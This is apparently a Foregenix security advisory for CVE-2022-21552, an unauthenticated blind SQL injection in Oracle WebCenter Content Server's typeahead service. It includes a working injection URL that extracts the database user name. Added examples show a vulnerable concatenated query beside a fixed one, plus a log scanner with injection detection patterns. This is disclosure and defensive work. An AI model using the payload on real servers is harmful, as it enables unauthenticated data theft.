OrionX Blog

SQL Injection in Oracle WebCenter Content Server CVE-2022-21552

Written by Zacharias Pigadas | 8/4/22 8:40 PM

FGX2022-001: Foregenix OrionX Security Advisory 

CVE: CVE-2022-21552

CVSSv3.1 Base Score: 7.2

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Version: 1.0


Vendor: Oracle

Product: WebCenter Content Server

Version(s) affected: 12.2.1.3.0, 12.2.1.4.0


Product Description

Oracle WebCenter Content Server (Content Server) software enables organisations to share, manage, and distribute business information using a web site as a low-cost access point.

Vulnerability Description

Foregenix has identified a SQL injection vulnerability in Oracle WebCenter Content Server. The vulnerability was identified in parts of Oracle WebCenter Content Server that do not require any authentication, hence it is reachable by any network-based attacker.

The vulnerability exists in the filter parameter of the GET_TYPEAHEAD_RESULTS service, which appears to provide an autocomplete feature as data is being entered by the user of the application. A vulnerable URL looks like:

/cs/idcplg?filter=a&IdcService=GET_TYPEAHEAD_RESULTS&searchColumns=dExtRoleName&sortColumns=dExtRoleName&dataSource=ExternalRoles&IsJson=1

By carefully crafting the input sent in the filter parameter, an attacker is able to inject their own queries and extract data out of the application or, depending on permissions and configuration details, insert, update or even destroy data.
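To make the mechanism concrete, here is an added, illustrative model of the flaw and of its fix. It is not Oracle WebCenter Content code and does not claim to mirror the product's implementation: an in-memory SQLite table stands in for the role data behind the ExternalRoles data source, the vulnerable function splices the filter value into the SQL text inside quotes (the shape the '||...||' probe above implies), and the hardened function passes the value as a bind parameter instead. The table name, function names and the probe strings are constructed assumptions, and the probe is adapted to SQLite (no DUAL table; a literal stands in for Oracle's USER).

```python
"""Illustrative model of a typeahead filter spliced into SQL, beside its fix.

Added example for this advisory; NOT Oracle WebCenter Content code. An
in-memory SQLite table stands in for the role data, and the probe below is
adapted to SQLite (no DUAL table, constructed literal instead of USER).
"""
import sqlite3


def make_db():
    """Constructed sample data: a few role names, including the default 'anonymous'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE roles (dExtRoleName TEXT)")
    conn.executemany("INSERT INTO roles VALUES (?)",
                     [("anonymous",), ("admin",), ("contributor",), ("guest",)])
    return conn


def typeahead_vulnerable(conn, prefix):
    """Vulnerable pattern: the prefix is concatenated into the SQL text inside
    single quotes, so a quote in the input closes the literal and everything
    after it is parsed as SQL."""
    sql = ("SELECT dExtRoleName FROM roles WHERE dExtRoleName LIKE '"
           + prefix + "%' ORDER BY dExtRoleName")
    return [row[0] for row in conn.execute(sql)]


def escape_like(value, esc="\\"):
    """Bind variables stop injection but not LIKE wildcards; escape '%' and '_'
    so a prefix such as 'a_' cannot match 'admin' via the single-char wildcard."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def typeahead_fixed(conn, prefix):
    """Hardened pattern: the prefix travels as a bind parameter, so the database
    treats it purely as data and the probe is just an unlikely role name."""
    sql = ("SELECT dExtRoleName FROM roles WHERE dExtRoleName LIKE ? ESCAPE '\\' "
           "ORDER BY dExtRoleName")
    return [row[0] for row in conn.execute(sql, (escape_like(prefix) + "%",))]


# Constructed probes modelled on the advisory's PoC: the True branch yields the
# filter 'an', the False branch 'zz'. 'attacker' stands in for the DB user name.
PROBE_TRUE = "'||(select case substr('attacker',1,1) when 'a' then 'an' else 'zz' end)||'"
PROBE_FALSE = "'||(select case substr('attacker',1,1) when 'b' then 'an' else 'zz' end)||'"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, True probe :", typeahead_vulnerable(db, PROBE_TRUE))
    print("vulnerable, False probe:", typeahead_vulnerable(db, PROBE_FALSE))
    print("fixed, True probe      :", typeahead_fixed(db, PROBE_TRUE))
    print("fixed, legitimate 'a'  :", typeahead_fixed(db, "a"))
```

With concatenation the True probe returns 'anonymous' and the False probe returns nothing, which is exactly the content-or-size oracle an attacker reads; with the bind parameter both probes return nothing while a legitimate prefix still works. The ESCAPE clause is the extra step that is easy to forget: without it, a parameterised query is injection-safe but still lets '%' and '_' in user input widen the match.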

Proof of Concept 

The vulnerability can be exploited using a typical blind SQL injection methodology, in which True and False conditions are identified from the responses returned by the web interface, permitting data to be extracted from the backend database. The following proof of concept was devised to extract the name of the user the application uses to connect to the backend database.

/cs/idcplg?filter='||(select+case+SUBSTR(user,1,1)+when+'a'+then+(select+'an'+from+dual)+else+(select+'zz'+from+dual)+end+from+dual)||'&IdcService=GET_TYPEAHEAD_RESULTS&searchColumns=dExtRoleName&sortColumns=dExtRoleName&dataSource=ExternalRoles&IsJson=1

The above PoC takes the first character of the user variable and compares it with the letter 'a'. If it matches (True), the query uses 'an' as the filter for the role-name search; if it does not (False), it uses 'zz'. Since a default role name is 'anonymous', the True condition can be identified either from the content of the response or simply from its size, as it will be larger and contain more content than the False one. By iterating over character positions and substituting the building blocks of the PoC, one is able to extract arbitrary data out of the database.
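For defenders who want to know whether the service was probed before the patch went in, the following added Python example (not part of the advisory and not Foregenix tooling) scans web-server access logs for GET_TYPEAHEAD_RESULTS requests whose filter parameter carries SQL syntax, and reports the spread of response sizes per client, since the True/False oracle described above shows up as two recurring sizes from one source. The log lines are constructed in Apache/NGINX combined format; the indicator list and the alert threshold are assumptions to tune for your traffic.

```python
"""Flag access-log requests that probe the GET_TYPEAHEAD_RESULTS filter parameter.

Added detection example for this advisory; not Foregenix or Oracle code.
Log lines are constructed (Apache/NGINX combined-style); the indicator list
and ALERT_THRESHOLD are assumptions to tune.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines. Lines 2 and 3 carry the advisory's
# boolean-blind probe (URL-encoded) with different response sizes; the
# others are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Aug/2022:10:01:02 +0000] "GET /cs/idcplg?filter=a&IdcService=GET_TYPEAHEAD_RESULTS&searchColumns=dExtRoleName&sortColumns=dExtRoleName&dataSource=ExternalRoles&IsJson=1 HTTP/1.1" 200 512
10.0.0.9 - - [04/Aug/2022:10:01:05 +0000] "GET /cs/idcplg?filter=%27%7C%7C(select+case+SUBSTR(user,1,1)+when+%27a%27+then+(select+%27an%27+from+dual)+else+(select+%27zz%27+from+dual)+end+from+dual)%7C%7C%27&IdcService=GET_TYPEAHEAD_RESULTS&searchColumns=dExtRoleName&sortColumns=dExtRoleName&dataSource=ExternalRoles&IsJson=1 HTTP/1.1" 200 1400
10.0.0.9 - - [04/Aug/2022:10:01:06 +0000] "GET /cs/idcplg?filter=%27%7C%7C(select+case+SUBSTR(user,1,1)+when+%27b%27+then+(select+%27an%27+from+dual)+else+(select+%27zz%27+from+dual)+end+from+dual)%7C%7C%27&IdcService=GET_TYPEAHEAD_RESULTS&searchColumns=dExtRoleName&sortColumns=dExtRoleName&dataSource=ExternalRoles&IsJson=1 HTTP/1.1" 200 310
10.0.0.7 - - [04/Aug/2022:10:02:00 +0000] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&QueryText=report HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Indicators of SQL syntax inside a value that should only ever be a search
# prefix. A lone quote is weak evidence (think "O'Brien"), so an alert needs
# at least ALERT_THRESHOLD indicators.
INDICATORS = [
    ("quote", re.compile(r"'")),
    ("concat", re.compile(r"\|\|")),
    ("select", re.compile(r"\bselect\b", re.I)),
    ("case_when", re.compile(r"\bcase\b.*\bwhen\b", re.I | re.S)),
    ("from_dual", re.compile(r"\bfrom\s+dual\b", re.I)),
    ("comment", re.compile(r"--|/\*")),
]
ALERT_THRESHOLD = 2


def inspect_target(target):
    """Return (decoded filter value, matched indicator names) for a request to
    GET_TYPEAHEAD_RESULTS, or None when the request is for another service."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "GET_TYPEAHEAD_RESULTS" not in params.get("IdcService", []):
        return None
    filter_value = " ".join(params.get("filter", []))
    hits = [name for name, rx in INDICATORS if rx.search(filter_value)]
    return filter_value, hits


def scan_log(text):
    """Parse access-log text and return one finding per request whose filter
    parameter matches at least ALERT_THRESHOLD indicators."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = inspect_target(m["target"])
        if result is None:
            continue
        filter_value, hits = result
        if len(hits) >= ALERT_THRESHOLD:
            findings.append({
                "ip": m["ip"],
                "timestamp": m["ts"],
                "status": int(m["status"]),
                "size": int(m["size"]) if m["size"] != "-" else 0,
                "filter": filter_value,
                "indicators": hits,
            })
    return findings


def size_spread_by_client(findings):
    """Per client, the smallest and largest response size among flagged requests.
    Two sizes recurring across many probes from one client is the footprint of
    the True/False oracle described in the advisory."""
    sizes = defaultdict(list)
    for f in findings:
        sizes[f["ip"]].append(f["size"])
    return {ip: (min(s), max(s)) for ip, s in sizes.items()}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['timestamp']} size={f['size']} indicators={f['indicators']}")
        print(f"    filter={f['filter']!r}")
    print("response-size spread per client:", size_spread_by_client(found))
```

Run it against a real log and the benign prefix 'a' and the unrelated GET_SEARCH_RESULTS call pass silently, while the two probes from 10.0.0.9 are reported together with their 1400-byte versus 310-byte responses. Because the check decodes the query string before matching, alternative encodings of the quote and the '||' operator are caught as well; a WAF rule that matches on the raw URL would need the same decoding step.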

Solution 

Apply the latest patch from the Vendor.

Disclosure 

Foregenix practises responsible disclosure of vulnerabilities and exploits, releasing information in coordination with the vendor as described in our Vulnerability Disclosure Policy. In the case at hand we agreed with the Vendor to extend our normal 90-day disclosure period to adhere to their patch management cycle.

Timeline

31/03/2022 - Vulnerability reported to Vendor

31/03/2022 - Vendor acknowledges receipt

24/04/2022 - Vendor acknowledges Vulnerability

16/05/2022 - Agreement to extend our disclosure period

19/07/2022 - Vulnerability is released by the vendor

04/08/2022 - Vulnerability details are released by Foregenix

About Foregenix

Foregenix is an Information Security specialist, delivering services and solutions to a global client base. Headquartered in the UK with regional offices in the United States, Germany, South Africa, Australia and Uruguay, we specialise in data security, offering services in information security, digital forensics and incident response, governance, enterprise risk management, compliance, and assurance to clients. Our advice is based on experience and understanding of our clients across the banking and finance, telecommunications, retail, hospitality, travel, online gaming and e-commerce industries in Europe, Africa, the United States, Latin America, APAC and the Middle East. Foregenix adds value through the deployment of professional and management consultancy services that fit the corporate risk appetite and budget of its clients.

About OrionX

OrionX is an advanced offensive security team made up of the most experienced Foregenix Penetration Testers that relies on research, specialised tools, creativity and innovative techniques. As such, it inherits all of Foregenix’s experience performing highly complex Penetration Testing projects across a wide range of industries. The team is constantly trained and ready to undertake demanding projects that are beyond the capabilities of ordinary Penetration Testing organisations.

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Foregenix disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Foregenix or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Foregenix or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.